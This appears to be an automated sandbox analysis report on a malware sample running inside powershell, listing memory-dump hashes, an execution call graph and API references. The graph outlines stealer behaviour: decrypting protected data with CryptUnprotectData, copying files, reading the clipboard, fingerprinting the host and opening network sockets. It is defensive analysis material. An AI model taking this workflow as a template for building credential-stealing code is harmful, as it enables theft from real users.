                                                                                                                                                                                                                                                        • Opcode ID: e220e3261f1aadb7f19eb255ed20777b9a35e54e91d20872d3cb8d317064d5d9
                                                                                                                                                                                                                                                        • Instruction ID: d888ffdd4d149eabd3f6aa86f9f41bf3e828c39d858fba41cb2d73002820b5b0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e220e3261f1aadb7f19eb255ed20777b9a35e54e91d20872d3cb8d317064d5d9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D912870E15208CFEB68DFAAD5847ADBBF2FB88301F108169D409A7394DB745986CF81
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 87688ee5343457b3e1f698ec7f242f4fec1415bd84532ff53db952058cffe1b0
                                                                                                                                                                                                                                                        • Instruction ID: ec4350a1f58a3e62ef6e09e3478a57785fb1b175317a0cbf3a0b8383a15c6778
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 87688ee5343457b3e1f698ec7f242f4fec1415bd84532ff53db952058cffe1b0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65914A70E15208CFDB68DFA9D5847ADBBF2FB88301F108169D409A7394DB345986CF81
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1c458365be640cc435e9728b2e436f980f13bbd963d0df950fa16b5fbded75fb
                                                                                                                                                                                                                                                        • Instruction ID: 52605c5a8c6149279bd2acf359eac7016cb602e6b725f16d7afa26c3963b4581
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c458365be640cc435e9728b2e436f980f13bbd963d0df950fa16b5fbded75fb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 07515A70E19208CFDB54CFA9D4487EDBBF6FB49301F549129D00AA7294DB745946CF84
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1a5eeb544b2f9a605c7e540c1d5eed1f559ab123806ca6c6f45b32af5e6c59c3
                                                                                                                                                                                                                                                        • Instruction ID: eea7badbaea7b93cfa26f26d96b72e08a9398bb34fa6cb9a676f70ccc073a64e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a5eeb544b2f9a605c7e540c1d5eed1f559ab123806ca6c6f45b32af5e6c59c3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F514870E15208CFEB54CFA9D8487EDBBF2FB89301F54912AE00AA7294DB744946CF84
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f4ef31a6f45ea60cb2945c3c74b72d489a57675ac7dbe0a58d845cb4b003d4e5
                                                                                                                                                                                                                                                        • Instruction ID: b34e52bb2e39208d51a3e1937db54712e71a450a6a413c4425916ee3294090df
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f4ef31a6f45ea60cb2945c3c74b72d489a57675ac7dbe0a58d845cb4b003d4e5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2414770E19208CFDB54DFA9D4887EDBBF2FB49301F64902AE00AA7294DB745946CF84
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7310000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: P0*j$P0*j$x/j$x/j$G,j$G,j$G,j$G,j
                                                                                                                                                                                                                                                        • API String ID: 0-2997598138
                                                                                                                                                                                                                                                        • Opcode ID: f4ff042bd0f6be04b0f758a9ba313f6443791c0d290136bc4792b14dc6be7d3d
                                                                                                                                                                                                                                                        • Instruction ID: 353d843d5011f729911d452d3c5b7911fefd98cf4929dd379c86076aa1e8e840
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f4ff042bd0f6be04b0f758a9ba313f6443791c0d290136bc4792b14dc6be7d3d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2F13BB1705209DFEB1D8F64C8147AEBBF6AF86211F14C06AE9099B251DB36DC41C762
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193473310.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c60000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: P0*j$P0*j$PHj$PHj$G,j$G,j
                                                                                                                                                                                                                                                        • API String ID: 0-3515970772
                                                                                                                                                                                                                                                        • Opcode ID: 3a471353a27abe6c573017ebb9b8cfd4b7bb5c047e78e8f111a2f8b2680ec663
                                                                                                                                                                                                                                                        • Instruction ID: 471b60b832cfaa142a4a15ecd29c2b8dfa3eb3e820de233ab0e14c0a23f9b0a4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a471353a27abe6c573017ebb9b8cfd4b7bb5c047e78e8f111a2f8b2680ec663
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 58C1C231B00208DFDB98CF66C480A6AB7F2AF89210F65C06DE9059B395CA31DD41CBA6
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7310000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: G,j$G,j$G,j$G,j
                                                                                                                                                                                                                                                        • API String ID: 0-3326077981
                                                                                                                                                                                                                                                        • Opcode ID: f56cad0ff6d5dbd63a582a97f8016f49a92dbeb6c7b19023453db7ec1e0fd874
                                                                                                                                                                                                                                                        • Instruction ID: 8cbf051ea871a1b47459380158c7aaced700b7b22f3757b0f4bcbb431d568cd5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f56cad0ff6d5dbd63a582a97f8016f49a92dbeb6c7b19023453db7ec1e0fd874
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1BB16BB5B042158FEB199A7998107EBBBE6DFC6320F24847AD90ADF241DE31DC41C395
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7310000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: G,j$G,j$G,j$G,j
                                                                                                                                                                                                                                                        • API String ID: 0-3326077981
                                                                                                                                                                                                                                                        • Opcode ID: 216e6c816b297b607c5afa87c5f33a582a6bad8dfce4422279be823eb31f4ab2
                                                                                                                                                                                                                                                        • Instruction ID: d1edbd1ff5d7d1b7ce8562dc4e90e539588d582e7d08a3cf9fd3d3b28316abe7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 216e6c816b297b607c5afa87c5f33a582a6bad8dfce4422279be823eb31f4ab2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B99158B1B05306CFEB29DA6984106AABBF6AFC6212F14C07BD50DCB651DB31C842CB91

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:10.7%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                        Signature Coverage:23.5%
                                                                                                                                                                                                                                                        Total number of Nodes:383
                                                                                                                                                                                                                                                        Total number of Limit Nodes:20
                                                                                                                                                                                                                                                        execution_graph 13423 41e7c0 13429 43dbf0 13423->13429 13425 41e842 getaddrinfo 13427 41e86c 13425->13427 13428 41e85e 13425->13428 13426 41e8c7 socket 13426->13427 13427->13426 13427->13428 13430 40c583 CoInitializeSecurity 13431 436145 13435 43dbf0 13431->13435 13433 43615d GetUserDefaultUILanguage 13434 436188 13433->13434 13436 43c58a 13438 43c460 13436->13438 13437 43c5f4 13438->13437 13441 43c1f0 LdrInitializeThunk 13438->13441 13440 43c54d 13441->13440 13442 43c2c8 13443 43c2e0 13442->13443 13443->13443 13444 43ccaf GetForegroundWindow 13443->13444 13445 43ccbe 13444->13445 13446 40d38e 13447 40d3b0 13446->13447 13450 437df0 13447->13450 13449 40d4e2 13449->13449 13452 437e10 CoCreateInstance 13450->13452 13453 438042 SysAllocString 13452->13453 13454 438440 13452->13454 13457 4380e7 13453->13457 13456 438450 GetVolumeInformationW 13454->13456 13462 438471 13456->13462 13458 43842f SysFreeString 13457->13458 13459 4380ef CoSetProxyBlanket 13457->13459 13458->13454 13460 438425 13459->13460 13461 43810f SysAllocString 13459->13461 13460->13458 13464 438200 13461->13464 13462->13449 13462->13462 13464->13464 13465 438237 SysAllocString 13464->13465 13466 43825b 13465->13466 13467 438413 SysFreeString SysFreeString 13466->13467 13468 438409 SysFreeString 13466->13468 13469 4382a3 VariantInit 13466->13469 13467->13460 13468->13467 13471 4382f0 13469->13471 13470 4383f8 VariantClear 13470->13468 13471->13470 13472 42c84d 13474 42c880 13472->13474 13473 42c97e 13474->13473 13476 43c1f0 LdrInitializeThunk 13474->13476 13476->13473 13477 408850 13479 40885f 13477->13479 13478 408acf ExitProcess 13479->13478 13480 408ab8 13479->13480 13481 40891c GetCurrentProcessId GetCurrentThreadId 13479->13481 13484 408ab3 13480->13484 13482 408941 13481->13482 13483 408945 SHGetSpecialFolderPathW GetForegroundWindow 13481->13483 13482->13483 13485 408a3d 13483->13485 13484->13478 13484->13480 13485->13480 13487 40c550 CoInitializeEx 13485->13487 13488 421853 13489 421860 13488->13489 13492 4218a0 13489->13492 13493 4218b7 13492->13493 13505 43e340 13493->13505 13495 4219fc 13502 421ff5 13495->13502 13510 43c1f0 LdrInitializeThunk 13495->13510 13511 43aaa0 13495->13511 13497 43aaa0 RtlFreeHeap 13499 422007 13497->13499 13498 42191d 13498->13495 13500 421880 13498->13500 13509 43c1f0 LdrInitializeThunk 13498->13509 13499->13500 13515 43c1f0 LdrInitializeThunk 13499->13515 13502->13497 13507 43e360 13505->13507 13506 43e4be 13506->13498 13507->13506 13516 43c1f0 LdrInitializeThunk 13507->13516 13509->13498 13510->13495 13512 43aab3 13511->13512 13513 43aac4 13511->13513 13514 43aab8 RtlFreeHeap 13512->13514 13513->13495 13514->13513 13515->13499 13516->13506 13517 414410 13518 414430 13517->13518 13519 43e340 LdrInitializeThunk 13518->13519 13520 41454d 13519->13520 13521 43e340 LdrInitializeThunk 13520->13521 13526 414792 13521->13526 13522 414965 13523 414866 13525 43aaa0 RtlFreeHeap 13523->13525 13536 414874 13525->13536 13526->13522 13526->13523 13526->13526 13528 43c1f0 LdrInitializeThunk 13526->13528 13538 438810 13526->13538 13527 414ff0 13528->13526 13531 43e340 LdrInitializeThunk 13531->13536 13536->13527 13536->13531 13537 43c1f0 LdrInitializeThunk 13536->13537 13555 43aad0 13536->13555 13563 43ad10 13536->13563 13567 43aec0 13536->13567 13575 43ae30 13536->13575 13579 43e6e0 13536->13579 13583 43e7d0 13536->13583 13537->13536 13540 438820 13538->13540 13543 438910 13540->13543 13589 43c180 13540->13589 13599 43c1f0 LdrInitializeThunk 13540->13599 13542 438c1a 13544 43aaa0 RtlFreeHeap 13542->13544 13543->13542 13546 43ad10 LdrInitializeThunk 13543->13546 13545 438c33 13544->13545 13545->13526 13551 438956 13546->13551 13547 438c1e 13548 43ae30 LdrInitializeThunk 13547->13548 13548->13542 13549 43c180 2 API calls 13549->13551 13550 43aaa0 RtlFreeHeap 13550->13551 13551->13547 13551->13549 13551->13550 13552 438c40 13551->13552 13554 43c1f0 LdrInitializeThunk 13551->13554 13553 43aaa0 RtlFreeHeap 13552->13553 13553->13547 13554->13551 13556 43aaf0 13555->13556 13559 43ab2e 13556->13559 13600 43c1f0 LdrInitializeThunk 13556->13600 13557 43ace1 13557->13536 13559->13557 13560 43ac0e 13559->13560 13601 43c1f0 LdrInitializeThunk 13559->13601 13561 43aaa0 RtlFreeHeap 13560->13561 13561->13557 13564 43adbe 13563->13564 13565 43ad21 13563->13565 13564->13536 13565->13564 13602 43c1f0 LdrInitializeThunk 13565->13602 13568 43af33 13567->13568 13570 43aed6 13567->13570 13568->13536 13569 43af2e 13572 43b06e 13569->13572 13604 43c1f0 LdrInitializeThunk 13569->13604 13570->13568 13570->13569 13603 43c1f0 LdrInitializeThunk 13570->13603 13572->13568 13605 43c1f0 LdrInitializeThunk 13572->13605 13576 43ae3a 13575->13576 13577 43ae8e 13575->13577 13576->13577 13606 43c1f0 LdrInitializeThunk 13576->13606 13577->13536 13581 43e700 13579->13581 13580 43e77e 13580->13536 13581->13580 13607 43c1f0 LdrInitializeThunk 13581->13607 13585 43e800 13583->13585 13584 43e87f 13586 43e94e 13584->13586 13609 43c1f0 LdrInitializeThunk 13584->13609 13585->13584 13608 43c1f0 LdrInitializeThunk 13585->13608 13586->13536 13590 43c1d0 13589->13590 13591 43c1ba 13589->13591 13592 43c1d6 13589->13592 13593 43c198 13589->13593 13596 43c1a6 13589->13596 13594 43aaa0 RtlFreeHeap 13590->13594 13591->13540 13595 43aaa0 RtlFreeHeap 13592->13595 13593->13590 13593->13591 13593->13592 13593->13596 13594->13592 13597 43c1df 13595->13597 13598 43c1ab RtlReAllocateHeap 13596->13598 13598->13591 13599->13540 13600->13559 13601->13560 13602->13564 13603->13569 13604->13572 13605->13568 13606->13577 13607->13580 13608->13584 13609->13586 13610 418792 13612 417720 13610->13612 13613 41879c 13610->13613 13611 417d60 13612->13611 13614 43aad0 2 API calls 13612->13614 13615 43ae30 LdrInitializeThunk 13612->13615 13616 43ad10 LdrInitializeThunk 13612->13616 13617 43aec0 LdrInitializeThunk 13612->13617 13618 43c1f0 LdrInitializeThunk 13612->13618 13614->13612 13615->13612 13616->13612 13617->13612 13618->13612 13619 431715 13620 43174d SysAllocString 13619->13620 13622 431903 13620->13622 13623 415799 13624 41579e 13623->13624 13625 43e6e0 LdrInitializeThunk 13624->13625 13626 4157b7 13625->13626 13627 43e7d0 LdrInitializeThunk 13626->13627 13628 4157f8 13626->13628 13627->13628 13631 4158fe 13628->13631 13633 43c1f0 LdrInitializeThunk 13628->13633 13630 415bc6 13631->13630 13632 415b95 CryptUnprotectData 13631->13632 13632->13630 13633->13631 13635 43cb19 13637 43cb40 13635->13637 13636 43cbae 13637->13636 13639 43c1f0 LdrInitializeThunk 13637->13639 13639->13636 13640 430758 SysAllocString 13641 43089c 13640->13641 13642 42d7e3 13643 42d7ee 13642->13643 13646 437c10 13643->13646 13648 437c30 13646->13648 13647 42d7fc 13650 437cae 13648->13650 13655 43c1f0 LdrInitializeThunk 13648->13655 13650->13647 13652 437d2e 13650->13652 13654 43c1f0 LdrInitializeThunk 13650->13654 13652->13647 13656 43c1f0 LdrInitializeThunk 13652->13656 13654->13652 13655->13650 13656->13647 13657 43c767 13658 43c790 13657->13658 13658->13658 13659 43c80e 13658->13659 13661 43c1f0 LdrInitializeThunk 13658->13661 13661->13659 13662 43cce6 13663 43cd00 13662->13663 13664 43cd6e 13663->13664 13669 43c1f0 LdrInitializeThunk 13663->13669 13668 43c1f0 LdrInitializeThunk 13664->13668 13667 43ce4d 13668->13667 13669->13664 13670 417da7 13673 43dbf0 13670->13673 13672 417dbd CreateProcessW 13674 4217ab 13675 4217d0 13674->13675 13675->13675 13676 4218a0 2 API calls 13675->13676 13677 42180b 13676->13677 13678 4218a0 2 API calls 13677->13678 13679 42182a 13678->13679 13680 430469 CoSetProxyBlanket 13681 418c6c 13684 41b2e0 13681->13684 13683 418c7c 13685 41b320 13684->13685 13686 41b5f4 CreateDesktopW 13685->13686 13686->13683 13687 417dee 13688 417e20 13687->13688 13690 417e9e 13688->13690 13706 43c1f0 LdrInitializeThunk 13688->13706 13692 417f6e 13690->13692 13705 43c1f0 LdrInitializeThunk 13690->13705 13694 41803e 13692->13694 13707 43c1f0 LdrInitializeThunk 13692->13707 13696 41810e 13694->13696 13708 43c1f0 LdrInitializeThunk 13694->13708 13697 43c1f0 LdrInitializeThunk 13696->13697 13701 417720 13696->13701 13697->13696 13698 43aad0 2 API calls 13698->13701 13699 417d60 13700 43ae30 LdrInitializeThunk 13700->13701 13701->13698 13701->13699 13701->13700 13702 43ad10 LdrInitializeThunk 13701->13702 13703 43aec0 LdrInitializeThunk 13701->13703 13704 43c1f0 LdrInitializeThunk 13701->13704 13702->13701 13703->13701 13704->13701 13705->13692 13706->13690 13707->13694 13708->13696 13709 40acf0 13710 40ad80 13709->13710 13710->13710 13711 43c180 2 API calls 13710->13711 13712 40ada5 13710->13712 13711->13710 13713 4214b0 13714 4214be 13713->13714 13716 421510 13713->13716 13717 4215d0 13714->13717 13718 4215e0 13717->13718 13721 43e510 13718->13721 13720 4216df 13723 43e530 13721->13723 13722 43e68e 13722->13720 13723->13722 13725 43c1f0 LdrInitializeThunk 13723->13725 13725->13722 13726 40d835 13728 40d71d 13726->13728 13727 40d8e2 13728->13726 13728->13727 13728->13728 13730 43c1f0 LdrInitializeThunk 13728->13730 13730->13728 13731 40c679 13732 40c690 13731->13732 13735 40c6de 13732->13735 13823 43c1f0 LdrInitializeThunk 13732->13823 13733 40c75e 13751 423860 13733->13751 13735->13733 13824 43c1f0 LdrInitializeThunk 13735->13824 13738 40c7cd 13760 423f20 13738->13760 13740 40c7ed 13776 4241c0 13740->13776 13742 40c80d 13794 425e30 13742->13794 13748 40c83f 13825 4329c0 13748->13825 13754 4238b0 13751->13754 13752 4218a0 2 API calls 13758 4239b4 13752->13758 13753 423c61 GetLogicalDrives 13757 43e510 LdrInitializeThunk 13753->13757 13754->13754 13755 43e510 LdrInitializeThunk 13754->13755 13756 423ac1 13754->13756 13754->13758 13759 423c77 13754->13759 13755->13756 13756->13753 13756->13756 13756->13758 13756->13759 13757->13759 13758->13738 13759->13752 13759->13758 13766 423fb0 13760->13766 13761 424198 13761->13740 13763 4240af 13837 41f7a0 13763->13837 13764 42439c 13849 43eca0 13764->13849 13766->13761 13766->13763 13766->13764 13841 43efb0 13766->13841 13770 424404 13771 424ffa 13770->13771 13772 43eb60 LdrInitializeThunk 13770->13772 13773 424f30 13770->13773 13861 43f330 13770->13861 13771->13771 13772->13770 13869 43c1f0 LdrInitializeThunk 13773->13869 13777 4241d0 13776->13777 13778 43eb60 LdrInitializeThunk 13777->13778 13781 424078 13778->13781 13779 43efb0 2 API calls 13779->13781 13780 424198 13780->13742 13781->13779 13781->13780 13782 42439c 13781->13782 13783 4240af 13781->13783 13784 43eca0 2 API calls 13782->13784 13785 41f7a0 2 API calls 13783->13785 13786 4243cb 13784->13786 13785->13780 13787 43eb60 LdrInitializeThunk 13786->13787 13789 424404 13786->13789 13787->13789 13788 43eb60 LdrInitializeThunk 13788->13789 13789->13788 13790 424ffa 13789->13790 13791 424f30 13789->13791 13792 43f330 2 API calls 13789->13792 13790->13790 13877 43c1f0 LdrInitializeThunk 13791->13877 13792->13789 13799 425e5c 13794->13799 13795 43efb0 2 API calls 13795->13799 13796 43c180 2 API calls 13796->13799 13797 40c82d 13803 4266d0 13797->13803 13798 43eb60 LdrInitializeThunk 13798->13799 13799->13795 13799->13796 13799->13797 13799->13798 13801 43eca0 2 API calls 13799->13801 13802 43c1f0 LdrInitializeThunk 13799->13802 13878 43f720 13799->13878 13801->13799 13802->13799 13804 4266f0 13803->13804 13806 42674e 13804->13806 13888 43c1f0 LdrInitializeThunk 13804->13888 13806->13806 13808 40c836 13806->13808 13810 42683e 13806->13810 13889 43c1f0 LdrInitializeThunk 13806->13889 13807 43aaa0 RtlFreeHeap 13807->13808 13811 426b50 13808->13811 13810->13807 13813 426b59 13811->13813 13812 426b64 13812->13748 13813->13812 13890 438c50 13813->13890 13815 4273e2 13815->13748 13816 43e340 LdrInitializeThunk 13820 4273b8 13816->13820 13817 43e6e0 LdrInitializeThunk 13817->13820 13818 4275c2 CopyFileW 13818->13820 13819 43e7d0 LdrInitializeThunk 13819->13820 13820->13815 13820->13816 13820->13817 13820->13818 13820->13819 13821 427795 13820->13821 13897 43c1f0 LdrInitializeThunk 13821->13897 13823->13735 13824->13733 13899 414400 13825->13899 13827 4329ce OpenClipboard 13828 4329f0 13827->13828 13829 40c891 13828->13829 13830 4329fb GetClipboardData 13828->13830 13831 432b73 CloseClipboard 13830->13831 13832 432a16 GlobalLock 13830->13832 13831->13829 13834 432a35 13832->13834 13833 432b62 GlobalUnlock 13833->13831 13835 432a73 GetWindowLongW 13834->13835 13836 432a45 13834->13836 13835->13836 13836->13833 13838 41f7d0 13837->13838 13838->13838 13839 4218a0 2 API calls 13838->13839 13840 41f7f9 13839->13840 13840->13761 13842 43efd0 13841->13842 13845 43f04e 13842->13845 13870 43c1f0 LdrInitializeThunk 13842->13870 13843 43f31c 13843->13766 13845->13843 13848 43f17e 13845->13848 13871 43c1f0 LdrInitializeThunk 13845->13871 13846 43aaa0 RtlFreeHeap 13846->13843 13848->13846 13850 43ecc0 13849->13850 13852 43ed3e 13850->13852 13872 43c1f0 LdrInitializeThunk 13850->13872 13854 4243cb 13852->13854 13856 43ee6e 13852->13856 13873 43c1f0 LdrInitializeThunk 13852->13873 13853 43aaa0 RtlFreeHeap 13853->13854 13854->13770 13857 43eb60 13854->13857 13856->13853 13859 43eb80 13857->13859 13858 43ec6e 13858->13770 13859->13858 13874 43c1f0 LdrInitializeThunk 13859->13874 13862 43f360 13861->13862 13865 43f3de 13862->13865 13875 43c1f0 LdrInitializeThunk 13862->13875 13863 43f712 13863->13770 13865->13863 13868 43f50e 13865->13868 13876 43c1f0 LdrInitializeThunk 13865->13876 13866 43aaa0 RtlFreeHeap 13866->13863 13868->13866 13868->13868 13869->13761 13870->13845 13871->13848 13872->13852 13873->13856 13874->13858 13875->13865 13876->13868 13877->13780 13879 43f731 13878->13879 13882 43f8ae 13879->13882 13886 43c1f0 LdrInitializeThunk 13879->13886 13880 43fb29 13880->13799 13882->13880 13884 43fa29 13882->13884 13887 43c1f0 LdrInitializeThunk 13882->13887 13883 43aaa0 RtlFreeHeap 13883->13880 13884->13883 13886->13882 13887->13884 13888->13806 13889->13810 13893 438c80 13890->13893 13891 43eb60 LdrInitializeThunk 13891->13893 13892 43efb0 2 API calls 13892->13893 13893->13891 13893->13892 13894 438db8 13893->13894 13895 43f720 2 API calls 13893->13895 13898 43c1f0 LdrInitializeThunk 13893->13898 13894->13820 13895->13893 13897->13815 13898->13893 13899->13827

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 9 437df0-437e0f 10 437e10-437e24 9->10 10->10 11 437e26-437e34 10->11 12 437e40-437e54 11->12 12->12 13 437e56-437e97 12->13 14 437ea0-437ec5 13->14 14->14 15 437ec7-437ede 14->15 17 437f92-437f9f 15->17 18 437ee4-437eef 15->18 19 437fa0-437fe0 17->19 20 437ef0-437f22 18->20 19->19 21 437fe2-43803c CoCreateInstance 19->21 20->20 22 437f24-437f37 20->22 23 438042-43807b 21->23 24 438440-43846f call 43dbf0 GetVolumeInformationW 21->24 25 437f40-437f82 22->25 27 438080-4380bc 23->27 31 438471-438475 24->31 32 438479-43847b 24->32 25->25 26 437f84-437f8e 25->26 26->17 27->27 29 4380be-4380e9 SysAllocString 27->29 37 43842f-43843c SysFreeString 29->37 38 4380ef-438109 CoSetProxyBlanket 29->38 31->32 33 43848d-438494 32->33 35 4384a0-4384b6 33->35 36 438496-43849d 33->36 39 4384c0-4384f0 35->39 36->35 37->24 40 438425-43842b 38->40 41 43810f-438121 38->41 39->39 42 4384f2-43852b 39->42 40->37 43 438130-438177 41->43 44 438530-438573 42->44 43->43 45 438179-4381f2 SysAllocString 43->45 44->44 46 438575-4385a5 call 41e5c0 44->46 47 438200-438235 45->47 52 4385b0-4385b8 46->52 47->47 49 438237-438261 SysAllocString 47->49 53 438413-438423 SysFreeString * 2 49->53 54 438267-438289 49->54 52->52 55 4385ba-4385bc 52->55 53->40 61 438409-438410 SysFreeString 54->61 62 43828f-438292 54->62 56 4385c2-4385d2 call 4081b0 55->56 57 438480-438487 55->57 56->57 57->33 58 4385d7-4385de 57->58 61->53 62->61 64 438298-43829d 62->64 64->61 65 4382a3-4382ef VariantInit 64->65 66 4382f0-438319 65->66 66->66 67 43831b-438333 66->67 69 438339-43833f 67->69 70 4383f8-438405 VariantClear 67->70 69->70 71 438345-438353 69->71 70->61 72 438355-43835a 71->72 73 43838d 71->73 75 43836c-438370 72->75 74 43838f-4383b7 call 408020 call 408d50 73->74 86 4383b9 74->86 87 4383be-4383ca 74->87 76 438372-43837b 75->76 77 438360 75->77 79 438382-438386 76->79 80 43837d-438380 76->80 82 438361-43836a 77->82 79->82 83 438388-43838b 79->83 80->82 82->74 82->75 83->82 86->87 88 4383d1-4383f4 call 408050 call 408030 87->88 89 4383cc 87->89 88->70 89->88
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32 ref: 00438034
                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 004380C3
                                                                                                                                                                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438101
                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 0043817E
                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 00438238
                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32 ref: 004382A8
                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 004383F9
                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00438410
                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32 ref: 0043841D
                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32 ref: 00438423
                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32 ref: 00438430
                                                                                                                                                                                                                                                        • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,66966446,00000000,00000000,00000000,00000000), ref: 00438468
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: String$Free$Alloc$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                                                                                                                                                                        • String ID: P%R$)\"^$.H4J$O@$pq
                                                                                                                                                                                                                                                        • API String ID: 1341229144-1397720406
                                                                                                                                                                                                                                                        • Opcode ID: cd14e05d7432ded1bf926f32cda1f224496113c88b4519bc978cba4cd539789a
